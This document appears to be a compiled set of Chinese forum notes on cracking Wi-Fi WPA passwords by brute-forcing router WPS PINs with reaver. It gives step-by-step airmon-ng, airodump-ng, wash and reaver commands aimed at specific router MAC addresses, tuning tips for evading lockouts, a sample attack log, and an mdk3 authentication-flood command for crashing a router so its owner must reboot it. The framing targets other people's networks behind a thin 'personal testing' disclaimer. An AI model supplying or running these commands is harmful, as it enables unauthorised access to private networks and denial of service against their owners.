reaver test

airmon-ng

airmon-ng start wlan0

airodump-ng mon0

apt-get update

apt-get install reaver

reaver -i mon0 -b 28:2C:B2:5E:79:14 -vv

reaver -i mon0 -b 28:2C:B2:5E:79:14 -vv -a -v -S -x 20 -r 100:10 -l 60 -n

路由器防PIN破解
http://download.csdn.net/detail/wugelidong/6486637

http://www.2cto.com/Article/201301/180749.html



http://www.backtrack.org.cn/thread-14804-1-1.html
在坛子里和群里，经常遇到朋友问PIN不动和重码严重如何解决的问题，这的确是一个很棘手的事情，多数情况下很难解决，但并非无路可走，现将本人总结的跑拼之独技奉献给大家：
        一、PIN不动和重码严重原因分析及一般应对方法
        1、对方路由没开WPS：遇到这种情况，只有一条路可选：放弃跑PIN，抓包吧。
        2、一般是信号差：换个好天线或找个好方位。
        3、信道干扰严重：半夜起来跑拼，凌晨1点到4点跑还是没改善那就很悲催了。
        4、客户端在线，对方电脑开启了防火墙：无端时再跑。
        5、路由其他原因：这种情况最复杂，可能被拼死了，需要等待重启，也可能是路由太弱，需要你施展绝技应对。
        6、虚拟机运行中出错或网卡断开了连接：重启虚拟机，拔插网卡重新扫描信号。
        二、修改水滴参数
        除上述一、的第1、6项外，如系2至5原因，可以修改一下水滴参数，或许你会有意外惊喜哦！
        目前大家使用较多的cdlinux镜像版本主要包括30211、30513、30608、31214等，其终端处理程序都是一样的，只是个别参数设置有点差异。PIN不动和重码严重时，大家可设置参数如下：
        参数一：-a –v –N –x20–r100:10 l300 –t12 –d0 （最佳方案，如想多等会，可将–t12修改为–t15等）
        参数二：-a –v –S –x20–r100:10 l300 –t12 –d0  （如重码多且速度太快，可将–d0修改为–d2等）
        参数三：-a –v –N –x20–r100:10 l300 –t12 –d0 –S（其他参数也可试一下，不要加-n）

        修改完参数后，一定要有耐心让拼码多跑一会，观察一下是否有变化，正常情况下是先慢，然后速度逐步提升，如等待5分钟左右还没动静，那就及时停止，再找机会试吧


http://blog.sina.com.cn/s/blog_61c07ac5010189fz.html

精解reaver用BT5成功PIN解码 

 

PIN码破密特点：

1、不需要客户端

2、有PIN码就能获得无线密码

3、八位数PIN码实际只有一万一千组随机密码

4、抓包、EWSA跑包，每个环节都有很大的不确定性，而PIN破密，只要开户WPS，破密只是个时间问题。

提醒：只限于个人测试使用，由于非法操作引起的相关法律责任与本作者无关。

reaver使用方法、步骤：
1、打开超级终端 ROOt shell  
2、如果电脑装有多个无线网卡，请先发指令

3、ifconfig -a
4、确认你用哪一个网卡WLAN0或WLAN1

下面的指令都是以单一网卡WLAN0为例

一、激活监听模式：

airmon-ng start wlan0

 

二、查看周边AP信息（抓包）：
airodump-ng  mon0

wash -i mon0 -C

 

观察要破AP的PWR信号强弱变化，注意同频干扰，调整网卡放置位置和角度、方向。

 

PWR 小于 -75 基本上会Timeout, PWR-60左右,则非常顺畅(2-6秒攻击一次)

 

三、按Ctrl+C终止抓包

四、 抓PIN码：
reaver -i mon0 -b MAC  -vv
例如：

reaver -i mon0 -b C8:3A:35:F6:BB:B8 -vv -a -S -d 0 -t 1

 

1.4版可用：

reaver -i mon0 -b C8:3A:35:F6:BB:B8 -v   （可用一个v）

 

注意，MAC中冒号不可省略，MAC地址的字母大小写均可， -vv是两个V不是W！

 

 

特别提示：

只有AP开启了WPS、QSS功能，才可以用PIN法破PSK密码!

如何查看AP是否开了WPS、QSS呢？

一、使用指令:
airodump-ng  mon0

MB一栏下，出现  54e. （看清楚有点“.”） 是开WPS的

AP关闭了WPS、或者没有QSS滴，会出现
WARNING: Failed to associate with XX:XX:XX:XX:XX:XX  (ESSID: XXXX)

PIN破密对信号要求极为严格,如果信号稍差，可能导致破密进度变慢或者路由死锁等（重复同一个PIN码 或 timeout）,特别是1、6默认频道中，有较多的AP，相互干扰,因此，确定网卡放置的最佳位置、方向、角度十分重要。


破解过程中 ，重复同一个PIN码 或 timeout 可随时随地按Ctrl+C终止，reaver会自动保存进度。
重复第2-4项内容，先看看AP信号强弱或是否关机，若继续破，则再次在终端中发送:

reaver -i mon0 -b MAC -vv

当reaver确定前4位PIN密码后，其工作完成任务进度数值将直接跳跃至90.9%以上，也就是说只剩余一千个密码组合了。总共一万一千个密码。

曙光就在前头，胜利往往在 再坚持一下的努力之中。

如果，90.9%进程后死机或停机，请记下PIN前四位数，用指令：

reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位数)

会从指定PIN段起破密。

 

 

额外：（假如pin死了，就用命令强制让路由器重启）

首先检测网卡：
ifconfig -a

然后模拟端口：
airmon-ng start wlan0

接下来用：
airodump-ng mon0   //扫描ap找到你pin死的路由器mac

 

用mdk3 做身份验证攻击
mdk3 mon0 a -a mac（被pin死的路由器的mac）

身份验证攻击效果说明：

身份验证攻击效果说明：
此攻击是针对无线AP的洪水攻击，又叫做身份验证攻击。其原理就是向AP发动大量的虚假的链接请求，这种请求数量一旦超 过了无线AP所能承受的范围，AP就会自动断开现有链接，使合法用户无法使用无线网络。迫使路由主人重启路由器。

说明：
此命令功能强大，使用错误会造成所有ap不能使用，请指定mac地址，然后使用，其余命令不要乱试。你要使用此命令的其他参数，请详细阅读此命令参数详解。

 

此操作会让路由器完全宕机，不但无线不能用，有线的也连接不了，必须重启路由器！

请谨慎使用！

 

如果出现99.99%的一直pin的，但就是不出密码，这可能是漏码了，要重新pin，所以一开始pin的时候就再加一个参数。

reaver -i mon0 -b MAC -a -Svvn -d 0

加一个  -n  的参数这样就不会漏码了

 http://wifibeta.com/2012-01/thread-606-1-1.html

http://my.oschina.net/superpdm/blog/70862

 

http://www.2cto.com/Article/201203/122043.html

使用REAVER破解PIN到90.00%~99.99%问题的解决办法

[+] Trying pin 02835679
[+] Sending EAPOL START request        
[+] Received identity request
[+] Sending identity response               
[+] Received M1 message                                             
[+] Sending M2 message                                                                     
[+] Received M3 message                                                                                            
[+] Sending M4 message         
[+] Received WSC NACK
===================
正常情况下在M4后，会收到WSC NACK包。这是就知道当前的0283是错误的。然后开始试下一个pin.
缺省情况下，如果在M4后没有收到任何包，等待超时后，也会认为当前的pin是错误的，然后开始试下一个pin.
如果是因为丢包的原因，没有收到M5包，显然正确的pin就会当作错误的pin.因此就会出现99.99%的问题。
解决办法很简单:
加上-n 参数即可。
reaver -vvnS -d 0 -b xxxx
 
注意：reaver 会为每个AP创建一个pin序列文件,这个文件存放在
        /etc/reaver/ 或/usr/local/etc/reaver,
       文件名字是"AP的MAC".wpc, 例如：AP的MAC是：FF：FF：FF：FF：FF：FF，那么文件名是
       FFFFFFFFFFFF.wpc
       这个文件也记录,Reaver已经检测到了哪个pin值。例如已经检测到了99985767,这个值在pin序列
       中的位置会被记录到文件中，这样就可以中途停掉reaver.下次开始时，还是从99985767开始。
因此在重新启动reaver之前要先删除这个pin序列文件。
高级用法：
注意如果是90.00%那么前四位是没有跑出来的.直接删除文件即可。
如果是99.99%，pin的前四位已经找到了。在删除.wpc文件之前，用reaver 加上-vv参数，记下前四位
的值。然后再删除.wpc文件。重新开始pin时，使用-pin 设置上面记下的前四位pin.这样就直接开始找
后四位的pin值了。
 
根据reaver的帮助，reaver缺省情况下会自动检查AP是否回应NACK.因此不需要加-n参数才对。
我看了一下代码，这确实是一个bug. 但是通过加-n参数，可以绕过这个bug.